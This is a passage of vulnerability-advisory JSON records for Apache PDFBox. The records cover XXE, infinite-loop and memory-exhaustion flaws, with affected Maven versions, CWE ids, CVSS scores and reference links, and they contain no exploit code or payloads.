"https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4717f902f8bc36d47b3fa978552a25e4ed3ddc2fffb52b94fbc4ab36@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r043edc5dcf9199f7f882ed7906b41cb816753766e88b8792dbf319a9@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/PDFBOX-4892" }, { "type": "PACKAGE", "url": "https://github.com/apache/pdfbox" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/19/9" } ], "database_specific": { "cwe_ids": [ "CWE-834" ], "github_reviewed": true, "github_reviewed_at": "2021-03-22T18:45:15Z", "nvd_published_at": "2021-03-19T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4c32-xmgj-2g98", "published": "2018-10-17T18:22:15Z", "modified": "2023-11-08T03:58:24.099687Z", "aliases": [ "CVE-2016-2175" ], "summary": "High severity vulnerability that affects org.apache.pdfbox:pdfbox", "details": "Apache PDFBox before 1.8.12 and 2.x before 2.0.1 does not properly initialize the XML parsers, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted PDF.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.8.12" } ] } ], "versions": [ "0.8.0-incubating", "0.8.0-incubator", "1.0.0", "1.1.0", "1.2.0", "1.2.1", "1.3.1", "1.4.0", "1.5.0", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4c32-xmgj-2g98/GHSA-4c32-xmgj-2g98.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.1" } ] } ], "versions": [ "2.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4c32-xmgj-2g98/GHSA-4c32-xmgj-2g98.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2175" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-4c32-xmgj-2g98" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ad5fbc86c1d1821ae1b963e8561ab6d6a5f66b2848e84f5a31477f54@%3Ccommits.tika.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201605.mbox/%3C83a03bcf-f86b-4688-37b5-615c080291d8@apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/137214/Apache-PDFBox-1.8.11-2.0.0-XML-Injection.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0179.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0248.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0249.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0272.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1739564" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1739565" }, { "type": "WEB", "url": "http://www.debian.org/security/2016/dsa-3606" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/538503/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/90902" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:58:03Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vqp-h455-42mr", "published": "2021-05-13T22:30:13Z", "modified": "2024-03-15T05:36:23.028589Z", "aliases": [ "CVE-2021-27906" ], "summary": "Uncontrolled Memory Allocation in Apache PDFBox", "details": "A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.23" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6vqp-h455-42mr/GHSA-6vqp-h455-42mr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27906" }, { "type": "WEB", "url": "https://github.com/apache/pdfbox/commit/8c47be1011c11dc47300faecffd8ab32fba3646f" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf35026148ccc0e1af133501c0d003d052883fcc65107b3ff5d3b61cd@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf35026148ccc0e1af133501c0d003d052883fcc65107b3ff5d3b61cd%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf78aef4793362e778e21e34328b0456e302bde4b7e74f229df0ee04@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r64982b768c8a2220b07aaf813bd099a9863de0d13eb212fd4efe208f@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/PDFBOX-5112" }, { "type": "PACKAGE", "url": "https://github.com/apache/pdfbox" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/19/10" } ], "database_specific": { "cwe_ids": [ "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2021-03-22T18:36:26Z", "nvd_published_at": "2021-03-19T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7grw-6pjh-jpc9", "published": "2021-06-15T15:54:29Z", "modified": "2024-03-08T05:18:50.960251Z", "aliases": [ "CVE-2021-31812" ], "summary": "Infinite Loop in Apache PDFBox", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31812" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf251f6c358087107f8c23473468b279d59d50a75db6b4768165c78d3@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/1" } ], "database_specific": { "cwe_ids": [ "CWE-834", "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:41:33Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c9jj-3wvg-q65h", "published": "2019-07-05T21:12:54Z", "modified": "2024-02-16T08:10:43.804701Z", "aliases": [ "CVE-2019-0228" ], "summary": "Vulnerability that affects org.apache.pdfbox:pdfbox", "details": "Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.14" }, { "fixed": "2.0.15" } ] } ], "versions": [ "2.0.14" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-c9jj-3wvg-q65h/GHSA-c9jj-3wvg-q65h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0228" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c9jj-3wvg-q65h" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1a3756557f8cb02790b7183ccf7665ae23f608a421c4f723113bca79@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8a19bd6d43e359913341043c2a114f91f9e4ae170059539ad1f5673c@%3Ccommits.tika.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bc8db1bf459f1ad909da47350ed554ee745abe9f25f2b50cad4e06dd@%3Cserver-dev.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/be86fcd7cd423a3fe6b73a3cb9d7cac0b619d0deb99e6b5d172c98f4@%3Ccommits.tika.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a2141abeddae66dd57025f1681c8425834062b7c0c7e0b1d830a95d@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32b8102392a174b17fd19509a9e76047f74852b77b7bf46af95e45a2@%3Cserver-dev.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:58Z", "nvd_published_at": "2019-04-17T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fg3j-q579-v8x4", "published": "2021-06-15T15:54:32Z", "modified": "2024-03-08T05:34:54.801835Z", "aliases": [ "CVE-2021-31811" ], "summary": "Uncontrolled memory consumption", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31811" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/2" } ], "database_specific": { "cwe_ids": [ "CWE-770", "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:39:19Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gx96-vgf7-hwfg", "published": "2018-10-17T18:22:29Z", "modified": "2024-02-16T08:14:19.885368Z", "aliases": [ "CVE-2018-11797" ], "summary": "In Apache PDFBox a carefully crafted PDF file can trigger an extremely long running computation", "details": "In Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.8.0" }, { "fixed": "1.8.16" } ] } ], "versions": [ "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.12", "1.8.13", "1.8.14", "1.8.15", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-gx96-vgf7-hwfg/GHSA-gx96-vgf7-hwfg.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.12" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-gx96-vgf7-hwfg/GHSA-gx96-vgf7-hwfg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11797" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-gx96-vgf7-hwfg" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/645574bc50b886d39c20b4065d51ccb1cd5d3a6b4750a22edbb565eb@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a9760973a873522f4d4c0a99916ceb74f361d91006b663a0a418d34a@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/10/msg00008.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:16Z", "nvd_published_at": "2018-10-05T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j2xq-pfff-mvgg", "published": "2022-05-13T01:53:29Z", "modified": "2024-02-20T05:34:40.059516Z", "aliases": [ "CVE-2018-8036" ], "summary": "Loop with Unreachable Exit Condition in Apache PDFBox", "details": "In Apache PDFBox 1.8.0 to 1.8.14 and 2.0.0RC1 to 2.0.10, a carefully crafted (or fuzzed) file can trigger an infinite loop which leads to an out of memory exception in Apache PDFBox's AFMParser.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.8.0" }, { "fixed": "1.8.15" } ] } ], "versions": [ "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.12", "1.8.13", "1.8.14", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.14", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-j2xq-pfff-mvgg/GHSA-j2xq-pfff-mvgg.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0RC1" }, { "fixed": "2.0.11" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.10", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.10", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-j2xq-pfff-mvgg/GHSA-j2xq-pfff-mvgg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8036" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9f62f742fd4fcd81654a9533b8a71349b064250840592bcd502dcfb6@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540@%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" } ], 